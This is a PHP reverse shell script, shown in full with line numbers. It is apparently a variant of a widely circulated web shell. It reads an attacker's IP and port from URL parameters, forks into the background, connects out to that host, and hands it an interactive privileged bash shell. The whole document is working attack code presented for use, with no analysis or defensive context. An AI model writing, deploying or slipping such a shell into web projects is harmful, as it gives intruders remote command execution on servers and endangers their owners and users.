shell (unencrypted) v6

1. 1 <?php
2. 2 set_time_limit (0);
3. 3 $VERSION = "1.0";
4. 4 $ip = $_GET["ip"];
5. 5 $port = $_GET["port"];
6. 6 $chunk_size = 1400;
7. 7 $write_a = null;
8. 8 $error_a = null;
9. 9 $shell = '/bin/bash -p -i';
10. 10 $daemon = 0;
11. 11 $debug = 0;
12. 12
13. 13 if (function_exists('pcntl_fork')) {
14. 14 // Fork and have the parent process exit
15. 15 $pid = pcntl_fork();
16. 16
17. 17 if ($pid == -1) {
18. 18 printit("ERROR: Can't fork");
19. 19 exit(1);
20. 20 }
21. 21
22. 22 if ($pid) {
23. 23 exit(0); // Parent exits
24. 24 }
25. 25
26. 26 // Make the current process a session leader
27. 27 // Will only succeed if we forked
28. 28 if (posix_setsid() == -1) {
29. 29 printit("Error: Can't setsid()");
30. 30 exit(1);
31. 31 }
32. 32
33. 33 $daemon = 1;
34. 34 } else {
35. 35 printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
36. 36 }
37. 37
38. 38 // Change to a safe directory
39. 39 chdir("/");
40. 40
41. 41 // Remove any umask we inherited
42. 42 umask(0);
43. 43
44. 44 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
45. 45 if (!$sock) {
46. 46 printit("$errstr ($errno)");
47. 47 exit(1);
48. 48 }
49. 49
50. 50 // Spawn shell process
51. 51 $descriptorspec = array(
52. 52 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
53. 53 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
54. 54 2 => array("pipe", "w") // stderr is a pipe that the child will write to
55. 55 );
56. 56
57. 57 $process = proc_open($shell, $descriptorspec, $pipes);
58. 58
59. 59 if (!is_resource($process)) {
60. 60 printit("ERROR: Can't spawn shell");
61. 61 exit(1);
62. 62 }
63. 63
64. 64 // Set everything to non-blocking
65. 65 // Reason: Occsionally reads will block, even though stream_select tells us they won't
66. 66 stream_set_blocking($pipes[0], 0);
67. 67 stream_set_blocking($pipes[1], 0);
68. 68 stream_set_blocking($pipes[2], 0);
69. 69 stream_set_blocking($sock, 0);
70. 70
71. 71 printit("Successfully opened reverse shell to $ip:$port");
72. 72
73. 73 while (1) {
74. 74 // Check for end of TCP connection
75. 75 if (feof($sock)) {
76. 76 printit("ERROR: Shell connection terminated");
77. 77 break;
78. 78 }
79. 79
80. 80 // Check for end of STDOUT
81. 81 if (feof($pipes[1])) {
82. 82 printit("ERROR: Shell process terminated");
83. 83 break;
84. 84 }
85. 85
86. 86 // Wait until a command is end down $sock, or some
87. 87 // command output is available on STDOUT or STDERR
88. 88 $read_a = array($sock, $pipes[1], $pipes[2]);
89. 89 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
90. 90
91. 91 // If we can read from the TCP socket, send
92. 92 // data to process's STDIN
93. 93 if (in_array($sock, $read_a)) {
94. 94 if ($debug) printit("SOCK READ");
95. 95 $input = fread($sock, $chunk_size);
96. 96 if ($debug) printit("SOCK: $input");
97. 97 fwrite($pipes[0], $input);
98. 98 }
99. 99
100. 100 // If we can read from the process's STDOUT
101. 101 // send data down tcp connection
102. 102 if (in_array($pipes[1], $read_a)) {
103. 103 if ($debug) printit("STDOUT READ");
104. 104 $input = fread($pipes[1], $chunk_size);
105. 105 if ($debug) printit("STDOUT: $input");
106. 106 fwrite($sock, $input);
107. 107 }
108. 108
109. 109 // If we can read from the process's STDERR
110. 110 // send data down tcp connection
111. 111 if (in_array($pipes[2], $read_a)) {
112. 112 if ($debug) printit("STDERR READ");
113. 113 $input = fread($pipes[2], $chunk_size);
114. 114 if ($debug) printit("STDERR: $input");
115. 115 fwrite($sock, $input);
116. 116 }
117. 117 }
118. 118
119. 119 fclose($sock);
120. 120 fclose($pipes[0]);
121. 121 fclose($pipes[1]);
122. 122 fclose($pipes[2]);
123. 123 proc_close($process);
124. 124
125. 125 // Like print, but does nothing if we've daemonised ourself
126. 126 // (I can't figure out how to redirect STDOUT like a proper daemon)
127. 127 function printit ($string) {
128. 128 if (!$daemon) {
129. 129 print "$string\n";
130. 130 }
131. 131 }
132. 132 ?>